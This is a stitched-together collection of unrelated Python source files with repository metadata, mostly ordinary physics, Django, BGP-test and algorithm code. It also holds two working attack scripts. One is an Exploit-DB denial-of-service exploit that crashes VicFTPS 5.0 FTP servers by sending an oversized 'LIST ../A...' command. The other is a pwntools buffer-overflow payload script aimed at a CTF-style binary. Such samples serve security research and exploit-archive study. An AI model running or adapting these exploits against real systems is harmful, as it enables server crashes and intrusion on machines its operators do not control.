    """FENE force magnitude f(r) = k*r / (1 - (r/ra)**2), with k = 10*e."""
    spring_k = 10 * e
    return spring_k * r / (1 - (r / ra) ** 2)
#
def graphic(r, sum, lj, fene, ylim, label, name):
    """Plot total, LJ, and FENE curves versus r and save to ../Graphics/<name>.png.

    Args:
        r: radial distances (x axis).
        sum: total curve (lj + fene), drawn solid.
        lj, fene: individual contributions, drawn dashed.
        ylim: upper y-axis limit (lower limit is fixed at -5).
        label: quantity label used in legend/axis, e.g. "V" or "F".
        name: output file name without extension.
    """
    # <---------------------------- Output directory -------------------->
    dir_graphics = "../Graphics/"
    plt.xlim(r[0], 1.3); plt.ylim(-5, ylim)
    plt.plot(r, sum, lw=3, color="#7400b8", label=label+"$(r)$")
    plt.plot(r, lj, lw=3, color="#5390d9", label=label+"$_{LJ}$", ls="--")
    plt.plot(r, fene, lw=3, color="#64dfdf", label=label+"$_{FENE}$", ls="--")
    plt.ylabel(label+"(r)"); plt.xlabel("Distancia radial (r)")
    plt.legend(frameon=False, ncol=1, loc="upper center", fontsize=12)
    plt.subplots_adjust(left=0.121, bottom=0.11, right=0.924, top=0.943)
    plt.savefig(dir_graphics+name+".png")
    # Clear the current figure so successive calls do not overlay curves.
    plt.clf()
# <------------------------ Parameters -------------------->
sigma=1;e=1;ra=1.3
# <------------------------------ Radius values ---------------------->
r=np.arange(0.8,1.29+0.01,0.01);n=np.size(r)
v=np.zeros(np.size(r));v_lj=np.zeros(np.size(r));v_fene=np.zeros(np.size(r))
f=np.zeros(np.size(r));f_lj=np.zeros(np.size(r));f_fene=np.zeros(np.size(r))
# <---------------------------- Potential -------------------->
# Accumulate each contribution only inside its cutoff radius.
for i in range(n):
    r_i=r[i]
    if r_i<2.5:  # LJ cutoff
        v_lj[i]+=potential_lj(r_i,e,sigma)
        f_lj[i]+=force_lj(r_i,e,sigma)
    if r_i<ra:  # FENE diverges at r == ra, so stay strictly below
        v_fene[i]+=potencial_fene(r_i,e,ra)
        f_fene[i]+=force_fene(r_i,e,ra)
# Totals are the sums of both contributions.
v=v_lj+v_fene
f=f_lj+f_fene
# Render the potential and force figures (saved under ../Graphics/).
graphic(r,v,v_lj,v_fene,30,"V","potential")
graphic(r,f,f_lj,f_fene,150,"F","force")
|
[
"giovannilopez9808@gmail.com"
] |
giovannilopez9808@gmail.com
|
edcd5818de24ad48b4dd91248306c61d7ac34f7b
|
44b6bc41fe8e424196f98dbc5b2f050c1f9645f8
|
/platforms/windows/dos/16230.py
|
e8600ad68d652ef330e3daac086438f90ca632dd
|
[] |
no_license
|
angeloobeta/exploit-database
|
21283dd8549f47836a35af6f3ea7b63b8dba11ea
|
43f3d9e94c01a7f51e30561a96214af231dd9d36
|
refs/heads/master
| 2021-08-08T21:07:38.794539
| 2017-11-11T05:01:28
| 2017-11-11T05:01:28
| 110,380,452
| 0
| 1
| null | 2017-11-11T21:09:05
| 2017-11-11T21:09:04
| null |
UTF-8
|
Python
| false
| false
| 3,696
|
py
|
#!/usr/bin/python
#
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#
#[+]Exploit Title: Exploit Denial of Service VicFTPS
#[+]Date: 02\24\11
#[+]Author C4SS!0 G0M3S
#[+]Software Link: http://vicftps.50webs.com/VicFTPS-5.0-bin.zip
#[+]Version: 5.0
#[+]Tested On: WIN-XP SP3
#[+]CVE: N/A
#[+]Language: Portuguese
#
#
#Author C4SS!0 G0M3S || Cassio Gomes
#E-mail Louredo_@hotmail.com
#Site www.x000.org/
#
#
import socket
import time
import os
import sys
if os.name == 'nt':
os.system("cls")#SE FOR WINDOWS
os.system("color 4f")
else:
os.system("clear")#SE FOR LINUX
def usage():
print """
============================================================
============================================================
===============Exploit Denial of Service Vicftps 5.0========
===============Autor C4SS!0 G0M3S || C\xe1ssio Gomes==========
===============E-mail Louredo_@hotmail.com==================
===============Site www.x000.org/===========================
============================================================
============================================================
"""
if len(sys.argv)!=3:
usage()
print "\t\t[-]Modo de Uso: python %s <Host> <Porta>" % sys.argv[0]
print "\t\t[-]Exemplo: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
buf = "../A" * (330/4)
usage()
print "\t\t[+]Conectando-se Ao Servidor %s\n" % sys.argv[1]
time.sleep(1)
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Checando se o Servidor e Vulneravel\n"
time.sleep(1)
banner = s.recv(2000)
if((banner.find("VicFTPS"))!=-1):
print "\t\t[+]Servidor e Vulneravel:)\n"
time.sleep(1)
else:
print "\t\t[+]Sinto Muito, Servidor Nao e Vulneravel:(\n"
time.sleep(1)
print "\t\t[+]Enviando Exploit Denial of Service\n"
time.sleep(1)
s.send("USER anonymous\r\n")
s.recv(2000)
s.send("PASS\r\n")
s.recv(2000)
s.send("LIST "+buf+"\r\n")
print "\t\t[+]Exploit Enviado Com Sucesso ao Servidor "+sys.argv[1]+"\n"
time.sleep(1)
print "\t\t[+]Checando Se o Exploit Funcionou\n"
time.sleep(1)
try:
sock = socket.socket(socket.AF_INET,sock.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Sinto Muito o Exploit Nao Funcionou:(\n"
time.sleep(1)
sys.exit(0)
except:
print "\t\t[+]Exploit Funcionou, Servidor Derrubado:)\n"
time.sleep(1)
except:
print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n"
|
[
"info@exploit-db.com"
] |
info@exploit-db.com
|
ed1e78002b6d5631a704ce698be181c232c0acf8
|
a475b8dfdbc90a57470b5be8dfd6fa2367de73f3
|
/testproj/testapp/models.py
|
f7132e89fc9556e3630c00942b04b806b562cece
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
Moliholy/django-tastypie-crust
|
9080be75726385716d75280f68cef7ad25b90761
|
520154aa36aa4ba9e132c4ea1d042ea8bcb235b2
|
refs/heads/master
| 2020-03-18T19:26:20.528764
| 2018-05-28T12:10:52
| 2018-06-12T14:53:26
| 135,154,352
| 0
| 0
| null | 2018-05-28T11:53:52
| 2018-05-28T11:53:51
| null |
UTF-8
|
Python
| false
| false
| 508
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
class Homepage(models.Model):
    # Owner of the homepage; references Django's built-in auth user model.
    user = models.ForeignKey('auth.User')
    # Address of the homepage.
    url = models.URLField()

    class Meta:
        verbose_name = _('Homepage')
        verbose_name_plural = _('Homepages')

    def __unicode__(self):
        """Human-readable representation (Python 2 style)."""
        format = ugettext('Homepage %(url)s of user %(username)s')
        return format % {'url': self.url, 'username': self.user.username}
|
[
"uranusjr@gmail.com"
] |
uranusjr@gmail.com
|
b2a5716e29cbd359293a072d81733438f86495a2
|
52e45c26c110c42de79383e8034fd280fd82a02f
|
/spatialdata/spatialdb/GravityField.py
|
13f3d151d4951e63b963de4d5d79d09bf78493dc
|
[
"MIT"
] |
permissive
|
geodynamics/spatialdata
|
1ae1d2583aae356e9e68cd434c1f17820b49d127
|
2da6aad61c136f0e15f066aaea5fd31851de112f
|
refs/heads/main
| 2023-08-15T07:22:17.676228
| 2023-07-28T03:32:07
| 2023-07-28T03:32:07
| 12,651,854
| 6
| 20
|
MIT
| 2023-07-28T03:32:09
| 2013-09-06T18:52:14
|
C++
|
UTF-8
|
Python
| false
| false
| 2,821
|
py
|
# ----------------------------------------------------------------------
#
# Brad T. Aagaard, U.S. Geological Survey
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2023 University of California, Davis
#
# See LICENSE.md for license information.
#
# ----------------------------------------------------------------------
from .SpatialDBObj import SpatialDBObj
from .spatialdb import GravityField as ModuleGravityField
class GravityField(SpatialDBObj, ModuleGravityField):
"""
Spatial database with gravity field information.
Implements `SpatialDB`.
"""
DOC_CONFIG = {
"cfg": """
# Specify a gravity field in 2D with gravity in the -y direction.
[gravity_field]
gravity_dir = [0, -1]
acceleration = 9.80665*meter/second**2
""",
}
import pythia.pyre.inventory
gravityDir = pythia.pyre.inventory.list("gravity_dir", default=[0.0, 0.0, -1.0])
gravityDir.meta['tip'] = "Direction of gravitational body force. " \
"(used only with a Cartesian coordinate system."
from pythia.pyre.units.length import meter
from pythia.pyre.units.time import second
acceleration = pythia.pyre.inventory.dimensional("acceleration",
default=9.80665 * meter / second**2)
acceleration.meta['tip'] = "Gravitational acceleration."
def __init__(self, name="gravityfield"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
def _defaults(self):
self.description = "Gravity field"
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self._validateParameters(self.inventory)
dir = list(map(float, self.gravityDir))
ModuleGravityField.setGravityDir(self, dir[0], dir[1], dir[2])
ModuleGravityField.setGravityAcc(self, self.acceleration.value)
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleGravityField.__init__(self)
def _validateParameters(self, params):
"""
Validate parameters.
"""
if (len(params.gravityDir) != 3):
raise ValueError("Gravity direction must be a 3 component list or tuple.")
try:
dirFloat = list(map(float, params.gravityDir))
except:
raise ValueError("Gravity direction must contain floating point values.")
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with GravityField.
"""
return GravityField()
# End of file
|
[
"baagaard@usgs.gov"
] |
baagaard@usgs.gov
|
6881aba7454b96576813d8e61f3828f6399b7b00
|
0fccee4c738449f5e0a8f52ea5acabf51db0e910
|
/genfragments/ThirteenTeV/XXTo4J/XXTo4J_M-50_CTau-1000mm_TuneCUETP8M1_13TeV_pythia8_cff.py
|
f20e41d229265892646774f2207a200192607813
|
[] |
no_license
|
cms-sw/genproductions
|
f308ffaf3586c19b29853db40e6d662e937940ff
|
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
|
refs/heads/master
| 2023-08-30T17:26:02.581596
| 2023-08-29T14:53:43
| 2023-08-29T14:53:43
| 11,424,867
| 69
| 987
| null | 2023-09-14T12:41:28
| 2013-07-15T14:18:33
|
Python
|
UTF-8
|
Python
| false
| false
| 2,894
|
py
|
COM_ENERGY = 13000. # GeV
MASS_POINT = 50 # GeV
CROSS_SECTION = 1 # pb
CTAU_POINT = 1000 # mm
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
"Higgs:useBSM = on",
"HiggsBSM:all = off",
"HiggsBSM:ffbar2A3H2 = on",
"35:m0 = %s" % MASS_POINT,
"36:m0 = %s" % MASS_POINT,
"35:tau0 = %s" % CTAU_POINT,
"36:tau0 = %s" % CTAU_POINT,
"35:0:bRatio = .2",
"35:1:bRatio = .2",
"35:2:bRatio = .2",
"35:3:bRatio = .2",
"35:4:bRatio = .2",
"35:5:bRatio = 0",
"35:9:bRatio = 0",
"35:10:bRatio= 0",
"36:0:bRatio = .2",
"36:1:bRatio = .2",
"36:2:bRatio = .2",
"36:3:bRatio = .2",
"36:4:bRatio = .2",
"36:5:bRatio = 0",
"36:9:bRatio = 0",
"36:10:bRatio = 0",
"35:0:meMode = 100",
"35:1:meMode = 100",
"35:2:meMode = 100",
"35:3:meMode = 100",
"35:4:meMode = 100",
"35:5:meMode = 100",
"35:9:meMode = 100",
"35:10:meMode = 100",
"36:0:meMode = 100",
"36:1:meMode = 100",
"36:2:meMode = 100",
"36:3:meMode = 100",
"36:4:meMode = 100",
"36:5:meMode = 100",
"36:9:meMode = 100",
"36:10:meMode = 100",
"HiggsA3:coup2d = 1",
"HiggsA3:coup2u = 1",
"HiggsA3:coup2H1Z = 0",
"HiggsA3:coup2H2Z = 1",
"HiggsA3:coup2l = 0",
"HiggsA3:coup2HchgW = 0",
"HiggsH2:coup2d = 1",
"HiggsH2:coup2u = 1",
"HiggsH2:coup2l = 0",
"HiggsH2:coup2Z = 0",
"HiggsH2:coup2W = 0",
"HiggsH2:coup2H1H1 = 0",
"HiggsH2:coup2A3A3 = 0",
"35:onMode = off",
"35:onIfAny = 1 2 3 4 5",
"36:onMode = off",
"36:onIfAny = 1 2 3 4 5",
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"dnash@cern.ch"
] |
dnash@cern.ch
|
a445d7c740160a7e33848149248180741d45af83
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/00_BofVar-unit-tests/07_32/remenissions-work/exploit-BofVar-3.py
|
b8ea6ed45800852876c676f658926951160fa819
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318
| 2020-10-05T06:45:16
| 2020-10-05T06:45:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-07-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x5a)
bof_payload.add_int32(0x28, 0xdead)
bof_payload.add_int32(0x24, 0xdead)
bof_payload.add_int32(0x20, 0xdeae)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
|
[
"ryancmeinke@gmail.com"
] |
ryancmeinke@gmail.com
|
f69ce16005e44fc509989b7f6e007b21ae1b0ae5
|
ff7e133648566b8a705cb5a214be8a82df5101d9
|
/algorithm/work_1/test.py
|
a15a7f356574f4bf7509cf40eb11373a9185fc38
|
[] |
no_license
|
hoik92/Algorithm
|
231433193ecba4a48ef830cab2c5b0115fa7246d
|
4085b83a692a211e10503949d4518205d404dcaf
|
refs/heads/master
| 2020-04-27T06:27:06.777255
| 2019-04-18T23:48:30
| 2019-04-18T23:48:30
| 174,108,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
import sys
sys.stdin = open('input.txt', 'r')
def mx_mn(T):
mxidx, mnidx = 0, 0
for i in range(len(T)):
if T[mxidx] < T[i]:
mxidx = i
if T[mnidx] > T[i]:
mnidx = i
return mxidx, mnidx
for tc in range(1, 11):
D = int(input())
T = list(map(int, input().split()))
for x in range(D):
mxidx, mnidx = mx_mn(T)
T[mxidx] -= 1
T[mnidx] += 1
mxidx, mnidx = mx_mn(T)
print(f"#{tc} {T[mxidx] - T[mnidx]}")
# for x in range(D):
# T[T.index(max(T))] -= 1
# T[T.index(min(T))] += 1
# print(f"#{tc} {max(T) - min(T)}")
|
[
"hoik92@nate.com"
] |
hoik92@nate.com
|
0c233a30fd722986b1ae834d7faed0df4ed8cd18
|
a40d2a4c1704c080b0454805218b7dd07f28218c
|
/yabgp/tests/unit/message/attribute/test_extcommunity.py
|
bb67218e7535e1898aafbbbca3858bf10dd9a231
|
[
"Apache-2.0"
] |
permissive
|
plucena24/yabgp
|
e524b2c58b262ddba868a93cbbab3c5a6f3419aa
|
bc817ed74b21743797faee565fe54efb1f4b85c7
|
refs/heads/master
| 2023-08-21T02:19:20.937686
| 2015-08-04T09:30:49
| 2015-08-04T09:30:49
| 40,301,596
| 0
| 0
|
Apache-2.0
| 2023-08-14T21:29:51
| 2015-08-06T11:35:33
|
Python
|
UTF-8
|
Python
| false
| false
| 4,466
|
py
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Test extended Community attribute """
import unittest
from yabgp.common import constants as bgp_cons
from yabgp.common import exception as excep
from yabgp.message.attribute.extcommunity import ExtCommunity
class TestExtCommunity(unittest.TestCase):
def test_parse_rt0(self):
# Route Target,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x02\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_0, '100:12')], ext_community)
def test_construct_rt0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x02\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_rt1(self):
# Route Target,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x02\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')], ext_community)
def test_construct_rt1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x02\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_rt2(self):
# Route Target,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x02\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')], ext_community)
def test_construct_rt2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x02\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_ro0(self):
# Route Origin,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x03\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_0, '100:12')], ext_community)
def test_construct_ro0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x03\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_ro1(self):
# Route Origin,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x03\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')], ext_community)
def test_construct_ro1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x03\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_ro2(self):
# Route Origin,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x03\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')], ext_community)
def test_construct_ro2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x03\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_invalid_length(self):
# invalid length
self.assertRaises(excep.UpdateMessageError, ExtCommunity.parse,
b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
try:
ExtCommunity.parse(value=b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
except excep.UpdateMessageError as e:
self.assertEqual(bgp_cons.ERR_MSG_UPDATE_ATTR_LEN, e.sub_error)
def test_parse_unknow(self):
# unknow
hex_tmp = b'\x09\x03\x00\x01\x00\x01\x00\x0c'
ext_community = ExtCommunity.parse(value=hex_tmp)
self.assertEqual(bgp_cons.BGP_EXT_COM_UNKNOW, ext_community[0][0])
if __name__ == '__main__':
unittest.main()
|
[
"xiaoquwl@gmail.com"
] |
xiaoquwl@gmail.com
|
ff20799864d9ab1630cd84985b26232f955a7bad
|
8ed9296cf14cbd48ad6c6ba977a4eddfb6158ec3
|
/src/idealised/simple_physics/simple_physics_custom.py
|
f427bcf74ae3c3f900988a4ea169b9ce6119018d
|
[
"BSD-3-Clause"
] |
permissive
|
JoyMonteiro/CliMT
|
51191c8e44eef28057971dd29de8e40c0bd3ef97
|
0949ed3a3a125638072351d7277ae4b956956d35
|
refs/heads/master
| 2021-04-09T17:45:56.369908
| 2016-10-28T08:32:26
| 2016-10-28T08:32:26
| 28,734,117
| 2
| 0
| null | 2015-01-03T03:45:23
| 2015-01-03T03:45:22
| null |
UTF-8
|
Python
| false
| false
| 6,114
|
py
|
import numpy as np
from component import Component
import _simple_physics_custom as phys
from grid import Grid
class simple_physics_custom(Component):
"""
Interface to the simple physics package. This is a modified version which allows the
user to switch off any of the three routines : large scale condensation, surface fluxes,
or boundary layer parameterisation
Reed and Jablonowski 2012:
title = {Idealized tropical cyclone simulations of intermediate complexity: a test case for {AGCMs}}
journal = {Journal of Advances in Modeling Earth Systems}
Instantiation
============
sp = climt.simple_physics(<args>)
where <args> include the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
grid (object) grid generated by by another
component which is used to
get latitudes for calculating
the forcing
dt 0 The (constant) time step to be seconds
used by the physics
Ts 2 The surface temperature to use IF
use_ext_ts is True (= 1)
and the following OPTIONAL arguments (1 indicates True, use 0 for False):
Name Dims Meaning Units Default Notes
cyclone 0 Integer indicating if 1
the physics must simulate
a cyclone. If 0, it
will simulate a moist baroclinic
environment. This option is used
only to generate surface temperatures.
This will be ignored if external
surface temperatures are
prescribed
lsc 0 Integer indicating whether
large scale condensation is active 1
pbl 0 Integer indicating whether 1
boundary layer is active
surf_flux 0 Integer indicating whether 1
surface fluxes are active
use_ext_ts 0 Integer indicating whether 0
surface temperature is externally
specified (else internal default
corresponding to constant value
of 302.15 K is used)
qflux 0 Integer indicating whether surface 1
latent heat fluxes are calculated
momflux 0 Integer indicating whether surface 1
momentum fluxes are calculated
tflux 0 Integer indicating whether surface 1
sensible heat fluxes are calculated
Usage
=====
call instance directly to get increments
inc = sp(<args>)
where <args> are the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
U 3 zonal winds ms-1
V 3 meridional winds ms-1
T 3 temperature K
p 3 atmospheric pressure Pa
pint 3 Pressure at model interfaces Pa
q 3 specific humidity g kg-1
ps 2 surface pressure Pa
* Outputs that are accessible as sp.<Name>
Name Dims Meaning Units Default Notes
Udot 3 zonal wind tendency ms-2
Vdot 3 meridional wind tendency ms-2
Tdot 3 temperature tendency Ks-1
qdot 3 humidity tendency g kg-1
precc 2 precipitation
"""
def __init__(self, **kwargs):
self.Name = 'simple_physics'
self.LevType = 'p'
self.SteppingScheme = 'explicit'
self.ToExtension = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.Required = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.FromExtension = ['Uinc', 'Vinc', 'Tinc', 'qinc', 'precc']
self.Prognostic = ['U', 'V', 'T', 'q']
self.Diagnostic = ['precc']
if 'grid' not in kwargs:
kwargs['grid'] = Grid(self,**kwargs)
time_step = 0
if 'dt' not in kwargs:
raise IndexError, '\n\n dt is a required argument'
nlevs = kwargs['grid']['nlev']
nlats = kwargs['grid']['nlat']
nlons = kwargs['grid']['nlon']
time_step = kwargs['dt']
phys.init_simple_physics(1, nlons, nlats, nlevs, time_step, kwargs)
Component.__init__(self,**kwargs)
def driver(self, u, v, temp, p, pint, q, ps, simTime=-1):
'''
Returns the tendencies for a simplified moist physics simulation
'''
latitudes = self.Grid['lat']
nlats = self.Grid['nlat']
nlons = self.Grid['nlon']
lons,lats,levs = u.shape
assert lons == nlons
assert lats == nlats
u_tend = np.zeros(u.shape)
v_tend = np.zeros(v.shape)
t_tend = np.zeros(temp.shape)
q_tend = np.zeros(q.shape)
precip = np.zeros((nlons,nlats))
t_out, u_out, v_out, q_out, precip_out = \
phys.get_tendencies(u, v, temp,
p, pint, q,
ps, latitudes)
return u_out,v_out,t_out,q_out,precip_out
|
[
"joy.merwin@gmail.com"
] |
joy.merwin@gmail.com
|
4b642e6a61f839f7027c9f80ffb3381877982af2
|
d63c503df093f4a6f2e4f5fa796c4864a4418461
|
/subarray.py
|
27c8cbb61999db7937c16409f9634e6da000b139
|
[] |
no_license
|
99rishita/Geeksforgeeks
|
963e4c9d484cd615e7ffb7f640d712f15cb7ad3e
|
ece2da9e1a5f39a54de4af4ee13913e67b10745e
|
refs/heads/master
| 2022-12-29T04:28:11.004559
| 2020-10-02T18:24:39
| 2020-10-02T18:24:39
| 277,882,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
def subarraysum(arr, k):
sum = 0
for i in range(0, len(arr)):
sum = arr[i]
#j = i+1
for j in range(i+1, len(arr)):
sum = sum + arr[j]
if sum > k:
break
if sum == k:
print(i+1)
print(j+1)
return
#arr = [1,2,3,7,5]
#k = 12
#arr = [1,2,3,4,5,6,7,8,9,10]
#k = 15
arr = [1, 4, 20, 3, 10, 5]
k = 33
subarraysum(arr, k)
|
[
"pinnintirevati999@gmail.com"
] |
pinnintirevati999@gmail.com
|
edcde8943da6aedbe6d9cb618303471335c58763
|
2da355c3e63d911995bd5661100d858ceeae5493
|
/python_data/Chapter 7/P/P-7.45.py
|
264f3ee6748288442c770f7725f1dce5236145c1
|
[] |
no_license
|
allenxzy/Data-and-Structures-and-Alogrithms
|
1f72e7471f7d8f8982985986eda57f896e73087d
|
5977ea9434b42032069b24a538f455067ef38283
|
refs/heads/master
| 2021-01-16T21:46:24.199337
| 2016-12-14T08:05:40
| 2016-12-14T08:05:40
| 60,823,594
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 566
|
py
|
#-*-coding: utf-8 -*-
"""
An array A is sparse if most of its entries are empty (i.e., None). A list
L can be used to implement such an array efficiently. In particular, for
each nonempty cell A[i], we can store an entry (i,e) in L, where e is the
element stored at A[i]. This approach allows us to represent A using O(m)
storage, where m is the number of nonempty entries in A. Provide such
a SparseArray class that minimally supports methods__getitem__(j) and
__setitem__(j, e) to provide standard indexing operations. Analyze the
efficiency of these methods.
"""
|
[
"xuzhiyuan0317@live.com"
] |
xuzhiyuan0317@live.com
|
92d622b8979f7189633fda47981ae316e0f50bb1
|
c4efe9f6416f989524fafb128525a0a71272f680
|
/python/python-test.py
|
a0fc2d56f0ca9636405a5daa8bf9512c4329afe5
|
[] |
no_license
|
drautb/sketchbook
|
dcc6eb586ffe739ee21ab74aa6b045073d38fc6b
|
12255fc3cc5c2cbccbc174333c76c339d9846d67
|
refs/heads/master
| 2023-07-27T10:05:40.737633
| 2023-07-25T19:18:32
| 2023-07-25T19:18:32
| 28,785,534
| 4
| 3
| null | 2023-03-07T03:15:24
| 2015-01-04T20:46:06
|
C++
|
UTF-8
|
Python
| false
| false
| 1,712
|
py
|
"""
Determine which elements in each array are not present in the other.
Numbers in array 1 that aren't in array 2:
<num1> <num2> <num3>...
Numbers in array 2 that aren't in array 1:
<num1> <num2> <num3>...
"""
def reconcileHelper(arr_a, arr_b):
in_a_not_b = []
in_b_not_a = []
# Some effort is wasted by subtracting both arrays from eachother.
# Instead, sort both arrays up front, (2 * NlogN) then iterate over them in parallel,
# noting which items are skipped in each array as we go.
arr_a.sort()
arr_b.sort()
a_len = len(arr_a)
b_len = len(arr_b)
arr_a_idx = 0
arr_b_idx = 0
while arr_a_idx < a_len and arr_b_idx < b_len:
# If the current element is in both, move on.
a_val = arr_a[arr_a_idx]
b_val = arr_b[arr_b_idx]
if a_val == b_val:
arr_a_idx += 1
arr_b_idx += 1
continue
# If they're not the same, record the lower one as a difference,
# and increment only that index.
if a_val < b_val:
in_a_not_b.append(a_val)
arr_a_idx += 1
else:
in_b_not_a.append(b_val)
arr_b_idx += 1
# There may have been some numbers left at the end of one of the lists.
# We need to add these to the difference.
if arr_a_idx < a_len:
in_a_not_b += arr_a[arr_a_idx:]
elif arr_b_idx < b_len:
in_b_not_a += arr_b[arr_b_idx:]
print("Numbers in array 1 that aren't in array 2:")
print_array(in_a_not_b)
print("Numbers in array 2 that aren't in array 1:")
print_array(in_b_not_a)
return
def print_array(arr):
for n in arr:
print("%d" % n, end=" ")
print("")
|
[
"drautb@gmail.com"
] |
drautb@gmail.com
|
